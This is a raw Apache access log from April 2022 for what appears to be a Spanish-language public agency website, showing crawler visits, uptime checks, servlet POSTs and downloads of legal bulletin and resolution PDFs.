200.118.64.109 - - [05/Apr/2022:03:22:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:22:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:22:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:22:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:23:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
201.245.192.253 - - [05/Apr/2022:03:22:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42885
200.118.64.109 - - [05/Apr/2022:03:23:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [05/Apr/2022:03:23:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68523c7f2483d482bab31e44eacf65451.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
201.245.192.253 - - [05/Apr/2022:03:23:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45453
40.77.167.46 - - [05/Apr/2022:03:24:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20701%20AL%20800/RESOLUCION%200705%20DE%202007.pdf HTTP/1.1" 200 1060513
172.22.2.4 - - [05/Apr/2022:03:24:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
2.57.121.50 - - [05/Apr/2022:03:25:52 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:03:25:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51717
216.245.221.92 - - [05/Apr/2022:03:26:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:28:18 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
118.184.177.25 - - [05/Apr/2022:03:28:28 -0500] "GET / HTTP/1.1" 200 319
66.249.65.13 - - [05/Apr/2022:03:29:44 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:03:30:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:31:51 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%202%20del%205%20de%20Mayo%20de%202014.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Apr/2022:03:31:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:30:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [05/Apr/2022:03:32:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42885
207.46.13.199 - - [05/Apr/2022:03:33:49 -0500] "GET /bla/resoluciones/resoluciones%202022/0313.pdf HTTP/1.1" 200 392814
201.245.192.253 - - [05/Apr/2022:03:33:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45453
69.171.251.18 - - [05/Apr/2022:03:34:09 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html?fbclid=IwAR06eM35n05eiu4mDxf-gaHJAOEUQJlE7T2q5flg8PXde_e3fJb-7zEp76M HTTP/1.1" 200 1025
216.245.221.92 - - [05/Apr/2022:03:36:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:35:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:36:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
136.243.79.223 - - [05/Apr/2022:03:40:58 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 406 -
216.245.221.92 - - [05/Apr/2022:03:41:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:03:42:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42885
172.22.2.4 - - [05/Apr/2022:03:41:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:03:43:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45453
172.22.2.4 - - [05/Apr/2022:03:42:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [05/Apr/2022:03:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:47:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:48:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
17.121.115.25 - - [05/Apr/2022:03:50:23 -0500] "-" 408 -
207.46.13.157 - - [05/Apr/2022:03:50:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
216.245.221.92 - - [05/Apr/2022:03:51:54 -0500] "HEAD / HTTP/1.1" 200 -
178.243.12.47 - - [05/Apr/2022:03:52:25 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
201.184.48.150 - - [05/Apr/2022:03:53:04 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
40.77.167.46 - - [05/Apr/2022:03:53:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20701%20AL%20800/RESOLUCION%200705%20DE%202007.pdf HTTP/1.1" 200 1060513
172.22.2.4 - - [05/Apr/2022:03:53:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:03:54:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
186.102.41.15 - - [05/Apr/2022:03:55:53 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
216.245.221.92 - - [05/Apr/2022:03:56:54 -0500] "HEAD / HTTP/1.1" 200 -
64.227.3.157 - - [05/Apr/2022:03:58:33 -0500] "GET /portaldeninos/ HTTP/1.1" 200 102040
172.22.2.4 - - [05/Apr/2022:03:58:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
193.118.53.202 - - [05/Apr/2022:03:58:52 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:03:58:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49099
172.22.2.4 - - [05/Apr/2022:03:59:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:04:00:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
216.245.221.92 - - [05/Apr/2022:04:01:54 -0500] "HEAD / HTTP/1.1" 200 -
82.103.114.42 - - [05/Apr/2022:04:03:58 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:04:05:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Apr/2022:04:06:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:04:05:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
34.91.143.109 - - [05/Apr/2022:04:09:38 -0500] "GET / HTTP/1.1" 200 319
186.84.153.1 - - [05/Apr/2022:04:09:57 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
